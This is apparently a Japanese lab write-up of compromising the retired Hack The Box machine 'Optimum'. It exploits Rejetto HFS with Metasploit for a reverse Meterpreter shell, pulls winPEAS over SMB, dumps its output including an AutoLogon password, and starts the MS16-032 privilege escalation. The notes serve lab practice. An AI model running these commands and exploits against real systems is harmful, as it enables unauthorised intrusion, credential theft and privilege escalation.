Open roaris opened 6 months ago
Loginを押すとBasic認証が求められる
SecListsに認証情報がないか調べたが無さそう
httpfileserver default credentials
で調べると、デフォルトのものはないと出てきた
https://rejetto.com/forum/index.php?topic=5093.0
httpfileserver 2.3 exploit
で調べると、https://www.exploit-db.com/exploits/39161 が出てきた (CVE-2014-6287)
コードを読むと、/search にリクエストしている
SearchはBasic認証を通していなくても使える機能なので問題ない
exploit/windows/http/rejetto_hfs_exec を使う
optionsを見ると、必須のパラメータであるSRVHOSTとSRVPORTという値があるが、exploitの内容を理解していないので、何の値なのか分からない
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web se
rver
Proxies no A proxy chain of format type:host:port[,t
ype:host:port][...]
RHOSTS yes The target host(s), see https://docs.meta
sploit.com/docs/using-metasploit/basics/u
sing-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to li
sten on. This must be an address on the l
ocal machine or 0.0.0.0 to listen on all
addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connection
s
SSLCert no Path to a custom SSL certificate (default
is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default
is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST 172.23.73.202 yes The listen address (an interface may be sp
ecified)
LPORT 4444 yes The listen port
8080はBurpで使ってたんで、8081をSRVPORTにした リバースシェルに成功 user.txtはすぐ見つかる
msf6 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 8081
SRVPORT => 8081
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Using URL: http://10.10.16.3:8081/FCabutCP7v
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /FCabutCP7v
[*] Sending stage (176198 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\jBaaLVQfIT.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.8:49162) at 2024-02-28 23:28:22 +0900
[*] Server stopped.
meterpreter > shell
Process 1832 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
optimum\kostas
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
06/03/2024 01:26 <DIR> .
06/03/2024 01:26 <DIR> ..
06/03/2024 01:26 <DIR> %TEMP%
18/03/2017 02:11 760.320 hfs.exe
06/03/2024 12:46 34 user.txt
2 File(s) 760.354 bytes
3 Dir(s) 5.621.055.488 bytes free
C:\Users\Administratorにはアクセスできない 権限昇格が必要
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users
18/03/2017 01:57 <DIR> .
18/03/2017 01:57 <DIR> ..
18/03/2017 01:52 <DIR> Administrator
18/03/2017 01:57 <DIR> kostas
22/08/2013 05:39 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 5.634.265.088 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
WinPEASという、Windowsにおける権限昇格のためのツールがあるらしい 使ってみた記事 : https://medium.com/@s12deff/windows-privilege-escalation-with-winpeas-94be6fb0f173
実行ファイルを持ってくる方法が分からない Linuxだったらwgetを使えば良いけど、Windowsの場合は? powershellを起動してコマンドを打っても固まる
C:\Users\kostas\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.
PS C:\Users\kostas\Desktop> pwd
(応答なし)
https://0xdf.gitlab.io/2021/03/17/htb-optimum.html を見ると、SMBを使ってやっていた SMBサーバの起動 https://qiita.com/Hashibirokou/items/5fbb2e94ca42434e4575#smb%E3%82%B5%E3%83%BC%E3%83%90
kali側
┌──(roaris㉿DESKTOP-G3SGKDT)-[~/htb/machine/retired/Optimum]
└─$ ls
winPEASx64.exe
┌──(roaris㉿DESKTOP-G3SGKDT)-[~/htb/machine/retired/Optimum]
└─$ sudo impacket-smbserver share . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
machine側
C:\Users\kostas\Desktop>copy \\10.10.16.3\share\winPEASx64.exe
copy \\10.10.16.3\share\winPEASx64.exe
1 file(s) copied.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is EE82-226D
Directory of C:\Users\kostas\Desktop
06/03/2024 02:43 <DIR> .
06/03/2024 02:43 <DIR> ..
06/03/2024 02:41 <DIR> %TEMP%
18/03/2017 02:11 760.320 hfs.exe
06/03/2024 12:46 34 user.txt
26/02/2024 09:57 2.387.456 winPEASx64.exe
3 File(s) 3.147.810 bytes
3 Dir(s) 5.631.569.920 bytes free
使い方 : https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md#parameters-examples
普通に実行するとありえない量のエラーログが出てきたのでsysteminfo userinfoだけ指定した(それでもこの量だが...)
C:\Users\kostas\Desktop>winPEASx64.exe systeminfo userinfo
winPEASx64.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
Creating Dynamic lists, this could take a while, please wait...
- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
[skipped, file search is disabled]
System Information
Basic System Information
Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#kernel-exploits
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
System Type: x64-based PC
Hostname: optimum
ProductName: Windows Server 2012 R2 Standard
EditionID: ServerStandard
ReleaseId:
BuildBranch:
CurrentMajorVersionNumber:
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC+02:00) Athens, Bucharest
IsVirtualMachine: True
Current Time: 6/3/2024 3:17:36
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB2959936, KB2896496, KB2919355, KB2920189, KB2928120, KB2931358, KB2931366, KB2933826, KB2938772, KB2949621, KB2954879, KB2958262, KB2958263, KB2961072, KB2965500, KB2966407, KB2967917, KB2971203, KB2971850, KB2973351, KB2973448, KB2975061, KB2976627, KB2977629, KB2981580, KB2987107, KB2989647, KB2998527, KB3000850, KB3003057, KB3014442,
[?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
[!] Windows version not supported, build number: '9600'
Showing All Microsoft Updates
[X] Exception: Exception has been thrown by the target of an invocation.
System Last Shutdown Date/time (from Registry)
Last Shutdown Date/time : 27/12/2022 2:59:45
User Environment Variables
Check for some passwords or keys in the env variables
COMPUTERNAME: OPTIMUM
USERPROFILE: C:\Users\kostas
HOMEPATH: \Users\kostas
LOCALAPPDATA: C:\Users\kostas\AppData\Local
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 6
LOGONSERVER: \\OPTIMUM
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
HOMEDRIVE: C:
SystemRoot: C:\Windows
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
PUBLIC: C:\Users\Public
FP_NO_HOST_CHECK: NO
APPDATA: C:\Users\kostas\AppData\Roaming
PROCESSOR_REVISION: 5507
USERNAME: kostas
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: OPTIMUM
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\kostas\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\kostas\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: OPTIMUM
System Environment Variables
Check for some passwords or keys in the env variables
FP_NO_HOST_CHECK: NO
USERNAME: SYSTEM
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
ComSpec: C:\Windows\system32\cmd.exe
TMP: C:\Windows\TEMP
OS: Windows_NT
windir: C:\Windows
PROCESSOR_ARCHITECTURE: AMD64
TEMP: C:\Windows\TEMP
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PSModulePath: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 6
PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 85 Stepping 7, GenuineIntel
PROCESSOR_REVISION: 5507
Audit Settings
Check what is being logged
Not Found
Audit Policy Settings - Classic & Advanced
WEF Settings
Windows Event Forwarding, is interesting to know were are sent the logs
Not Found
LAPS Settings
If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed
Wdigest
If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#wdigest
Wdigest is not enabled
LSA Protection
If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#lsa-protection
LSA Protection is not enabled
Credentials Guard
If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#credential-guard
CredentialGuard is not enabled
[X] Exception: [X] 'Win32_DeviceGuard' WMI class unavailable
Cached Creds
If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10
Enumerating saved credentials in Registry (CurrentPass)
AV Information
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
Windows Defender configuration
Local Settings
Group Policy Settings
UAC Status
If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken: 0
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 4.0
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file:
PS history size:
Enumerating PowerShell Session Settings using the registry
You must be an administrator to run this check
PS default transcripts history
Read the PS history inside these files (if any)
HKCU Internet Settings
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
IE5_UA_Backup_Flag: 5.0
ZonesSecurityUpgrade: System.Byte[]
EmailName: User@
AutoConfigProxy: wininet.dll
MimeExclusionListForCache: multipart/mixed multipart/x-mixed-replace multipart/x-byteranges
WarnOnPost: System.Byte[]
UseSchannelDirectly: System.Byte[]
EnableHttp1_1: 1
UrlEncoding: 0
SecureProtocols: 2720
PrivacyAdvanced: 0
DisableCachingOfSSLPages: 0
WarnonZoneCrossing: 0
CertificateRevocation: 1
EnableNegotiate: 1
MigrateProxy: 1
ProxyEnable: 0
HKLM Internet Settings
CodeBaseSearchPath: CODEBASE
EnablePunycode: 1
WarnOnIntranet: 1
MinorVersion: 0
ActiveXCache: C:\Windows\Downloaded Program Files
Drives Information
Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 5 GB)(Permissions: Users [AppendData/CreateDirectories])
Checking WSUS
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
Not Found
Checking KrbRelayUp
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system isn't inside a domain, so it isn't vulnerable
Checking If Inside Container
If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
Checking AlwaysInstallElevated
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated isn't available
Enumerate LSA settings - auth packages included
Bounds : 00-30-00-00-00-20-00-00
auditbasedirectories : 0
fullprivilegeauditing : 00
crashonauditfail : 0
auditbaseobjects : 0
Security Packages : ""
LimitBlankPasswordUse : 1
NoLmHash : 1
Notification Packages : rassfm,scecli
Authentication Packages : msv1_0
LsaPid : 492
SecureBoot : 1
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1
Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
NTLM Signing Settings
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
NTLM Auditing and Restrictions
InboundRestrictions : (Not defined)
OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :
Display Local Group Policy settings - local users/machine
Checking AppLocker effective policy
AppLockerPolicy version: 1
listing rules:
Enumerating Printers (WMI)
Name: Microsoft XPS Document Writer
Status: Unknown
Sddl: O:SYD:(A;OIIO;GA;;;CO)(A;OIIO;GA;;;AC)(A;;SWRC;;;WD)(A;CIIO;GX;;;WD)(A;;SWRC;;;AC)(A;CIIO;GX;;;AC)(A;;LCSWDTSDRCWDWO;;;BA)(A;OICIIO;GA;;;BA)
Is default: True
Is network printer: False
=================================================================================================
Enumerating Named Pipes
Name CurrentUserPerms Sddl
eventlog Everyone [WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
vgauth-service Everyone [WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
Enumerating AMSI registered providers
Enumerating Sysmon configuration
You must be an administrator to run this check
Enumerating Sysmon process creation logs (1)
You must be an administrator to run this check
Installed .NET versions
CLR Versions
4.0.30319
.NET Versions
4.5.51641
.NET & AMSI (Anti-Malware Scan Interface) support
.NET version supports AMSI : False
OS supports AMSI : False
Users Information
Users
Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups
Current user: kostas
Current groups: Domain Users, Everyone, Users, Interactive, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication
=================================================================================================
OPTIMUM\Administrator: Built-in account for administering the computer/domain
|->Groups: Administrators
|->Password: CanChange-Expi-Req
OPTIMUM\Guest(Disabled): Built-in account for guest access to the computer/domain
|->Groups: Guests
|->Password: NotChange-NotExpi-NotReq
OPTIMUM\kostas
|->Groups: Users
|->Password: CanChange-NotExpi-Req
Current User Idle Time
Current User : OPTIMUM\kostas
Idle Time : 00h:21m:44s:859ms
Display Tenant information (DsRegCmd.exe /status)
Current Token privileges
Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#token-manipulation
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
Clipboard text
Logged users
OPTIMUM\kostas
Display information about local users
Computer Name : OPTIMUM
User Name : Administrator
User Id : 500
Is Enabled : True
User Type : Administrator
Comment : Built-in account for administering the computer/domain
Last Logon : 6/3/2024 2:56:43
Logons Count : 85
Password Last Set : 18/3/2017 1:51:34
=================================================================================================
Computer Name : OPTIMUM
User Name : Guest
User Id : 501
Is Enabled : False
User Type : Guest
Comment : Built-in account for guest access to the computer/domain
Last Logon : 1/1/1970 12:00:00
Logons Count : 0
Password Last Set : 1/1/1970 12:00:00
=================================================================================================
Computer Name : OPTIMUM
User Name : kostas
User Id : 1001
Is Enabled : True
User Type : User
Comment :
Last Logon : 6/3/2024 2:56:05
Logons Count : 12
Password Last Set : 18/3/2017 1:56:19
=================================================================================================
RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console kostas OPTIMUM Active
Ever logged users
OPTIMUM\Administrator
OPTIMUM\kostas
Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\kostas : kostas [AllAccess]
C:\Users\Public : Interactive [WriteData/CreateFiles]
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : kostas
DefaultPassword : kdeEjDowkS*
Password Policies
Check for a possible brute-force
Domain: Builtin
SID: S-1-5-32
MaxPasswordAge: 42.22:47:31.7437440
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: 0
=================================================================================================
Domain: OPTIMUM
SID: S-1-5-21-605891470-2991919448-81205106
MaxPasswordAge: 42.00:00:00
MinPasswordAge: 00:00:00
MinPasswordLength: 0
PasswordHistoryLength: 0
PasswordProperties: DOMAIN_PASSWORD_COMPLEX
=================================================================================================
Print Logon Sessions
Method: WMI
Logon Server:
Logon Server Dns Domain:
Logon Id: 225699
Logon Time:
Logon Type: 0
Start Time: 1/1/1601 2:00:00
Domain: OPTIMUM
Authentication Package:
Start Time: 1/1/1601 2:00:00
User Name: kostas
User Principal Name:
User SID:
=================================================================================================
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
https://qiita.com/GenkaiChan/items/7039fdbe84d5c33ce90e を見て進める
multi/recon/local_exploit_suggester を使うと、シェルを奪えたマシン上での脆弱性を列挙することが出来るらしい シェルを奪ったセッションを指定して実行する セッションの使い方 : https://gintachan.com/metasploit-use-module-run/
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Using URL: http://10.10.16.3:8080/Y1YmiJa
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /Y1YmiJa
[*] Sending stage (176198 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\YzgsetTrj.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.8:49166) at 2024-03-04 23:59:57 +0900
[*] Server stopped.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/window OPTIMUM\kostas @ OPTIM 10.10.16.3:4444 -> 10.
s UM 10.10.8:49166 (10.10.1
0.8)
msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for
the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf6 post(multi/recon/local_exploit_suggester) > exploit
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 193 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
This module will bypass Windows UAC by hijacking a special key in
the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows Event Viewer is
launched. It will spawn a second shell that has the UAC flag turned
off. This module modifies a registry key, but cleans up the key once
the payload has been invoked. The module does not require the
architecture of the payload to match the OS. If specifying
EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
[+] 10.10.10.8 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
This module will bypass UAC on Windows 8-10 by hijacking a special
key in the Registry under the Current User hive, and inserting a
custom command that will get invoked when any binary (.exe)
application is launched. But slui.exe is an auto-elevated binary
that is vulnerable to file handler hijacking. When we run slui.exe
with changed Registry key
(HKCU:\Software\Classes\exefile\shell\open\command), it will run our
custom command as Admin instead of slui.exe. The module modifies the
registry in order for this exploit to work. The modification is
reverted once the exploitation attempt has finished. The module does
not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after
starting the payload in a different process.
[+] 10.10.10.8 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
This module exploits CVE-2020-0787, an arbitrary file move
vulnerability in outdated versions of the Background Intelligent
Transfer Service (BITS), to overwrite
C:\Windows\System32\WindowsCoreDeviceInfo.dll with a malicious DLL
containing the attacker's payload. To achieve code execution as the
SYSTEM user, the Update Session Orchestrator service is then
started, which will result in the malicious
WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a
DLL hijacking issue within the Update Session Orchestrator Service.
Note that presently this module only works on Windows 10 and Windows
Server 2016 and later as the Update Session Orchestrator Service was
only introduced in Windows 10. Note that only Windows 10 has been
tested, so your mileage may vary on Windows Server 2016 and later.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
This module exploits the lack of sanitization of standard handles in
Windows' Secondary Logon Service. The vulnerability is known to
affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This
module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
[+] 10.10.10.8 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
This module leverages a UAC bypass (TokenMagic) in order to spawn a
process/conduct a DLL hijacking attack to gain SYSTEM-level
privileges. Windows 7 through Windows 10 1803 are affected.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.8 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
4 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
5 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
6 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
7 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
8 exploit/windows/local/always_install_elevated No The target is not exploitable.
9 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
10 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
11 exploit/windows/local/bthpan No The target is not exploitable.
12 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
13 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
14 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
15 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
16 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
17 exploit/windows/local/ikeext_service No The check raised an exception.
18 exploit/windows/local/ipass_launch_app No The check raised an exception.
19 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
20 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
21 exploit/windows/local/mqac_write No The target is not exploitable.
22 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
23 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2012 R2 (6.3 Build 9600). is not vulnerable
24 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
25 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
26 exploit/windows/local/ms14_058_track_popup_menu No The target is not exploitable.
27 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
28 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
29 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
30 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
31 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
39 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
exploit/windows/local/ms16_032_secondary_logon_handle_privesc が使えそう(privescとあるので権限昇格が狙える)
権限昇格に成功した ポート4444は1つ目のセッションで使っているので、使えないかと思ったけど、なんか使えた
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread,
process, none)
LHOST 172.23.73.202 yes The listen address (an interface may be sp
ecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\GhMiEXc.ps1...
[*] Compressing script contents...
[+] Compressed size: 3745
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
